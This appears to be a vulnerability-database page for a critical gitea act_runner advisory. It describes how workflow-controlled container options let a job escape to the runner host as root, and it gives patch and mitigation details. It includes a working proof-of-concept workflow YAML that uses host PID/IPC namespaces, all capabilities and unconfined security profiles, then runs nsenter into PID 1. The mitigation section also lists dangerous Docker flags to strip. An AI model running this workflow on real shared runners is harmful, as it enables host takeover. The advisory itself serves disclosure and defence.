CVE-2026-73802Critical· 9.9▾ Midnightgitea-runner: workflow container.options passes host namespaces and capability flags to job container when privileged mode is disabled
▾ Midnight zone — Critical, or high with PoC / in-the-wild
impact 54.5 · likelihood 0 · exploitation 0
Need a working PoC? Pro members can cast a request and our team develops one — it lands right here.
act_runner appends workflow-controlled jobs.<job>.container.options directly
to the Docker HostConfig for the job container. When runner privileged mode is
disabled, only Privileged is forced false. Host namespace flags, capability
expansion, and security profile overrides from workflow YAML are preserved in
the final HostConfig. A workflow author can enter host PID/IPC namespaces and
execute commands on the runner host as root.
Source-to-sink path in act_runner:
ContainerSpec.Options accepts workflow YAML container.optionsRunContext.options() appends workflow options to runner-level container optionsPrivileged: rc.Config.Privileged but also
with Options: rc.options(ctx)mergeContainerConfigs() parses Docker CLI-style options into HostConfigcopts.privileged is forced falsesanitizeConfig() only filters Binds and MountsPrivileged=false
PidMode=host
IpcMode=host
CapAdd=["ALL"]
SecurityOpt=["seccomp=unconfined","apparmor=unconfined"]
Attacker workflow YAML:
jobs:
breakout:
runs-on: ubuntu-latest
container:
image: ubuntu:22.04
options: >-
--pid=host --ipc=host --cap-add=ALL
--security-opt seccomp=unconfined
--security-opt apparmor=unconfined
steps:
- name: host namespace marker
run: |
nsenter -t 1 -m -u -i -n -p -- sh -c "id > /tmp/marker"
An attacker who can submit a workflow to a repository using a shared Docker-backed act_runner can:
Critical severity for shared runners where untrusted users can trigger workflows. High severity for single-tenant runners with privileged mode explicitly disabled as a security control.
Treat container.options as untrusted input. Reject or strip when
privileged mode is disabled:
--pid=host, --ipc=host, --uts=host, --network=host--cap-add ALL, --cap-add SYS_ADMIN--security-opt seccomp=unconfined, --security-opt apparmor=unconfined--device, --device-cgroup-rule--volumes-from--runtime, --cgroup-parentgitea.com/gitea/runner < 1.0.9-0.20260731160927-34bfa1915022Upgrade to a patched release:
gitea.com/gitea/runner 1.0.9-0.20260731160927-34bfa1915022Connected by shared product, vendor, weakness, or advisory.
CVE-2025-68939High· 8.2Gitea allows attackers to add attachments with forbidden file extensions
CVE-2026-60004Critical· 9.8Gitea before 1.27.1 allows remote code execution via the diffpatch API through Git hook installation.
CVE-2018-16497High· 7.8In Versa Analytics, the cron jobs are used for scheduling tasks by executing commands at specific dates and times on the server
CVE-2021-20021Critical· 9.8A vulnerability in the SonicWall Email Security version 10.0.9.x allows an attacker to create an administrative account by sending a crafted HTTP request to the remote host.
CVE-2026-34966High· 7.6Gitea prior to 1.27.0 contains a server-side request forgery vulnerability that allows authenticated attackers to bypass SSRF protections by exploiting HTTP fetch operations in migration and OAuth avatar code paths that use Go's default …
GO-2026-6074NoneGitea: API Fork Endpoint Authorization Bypass Allows Organization Members to Bypass Repository Creation Restrictions in code.gitea.io/gitea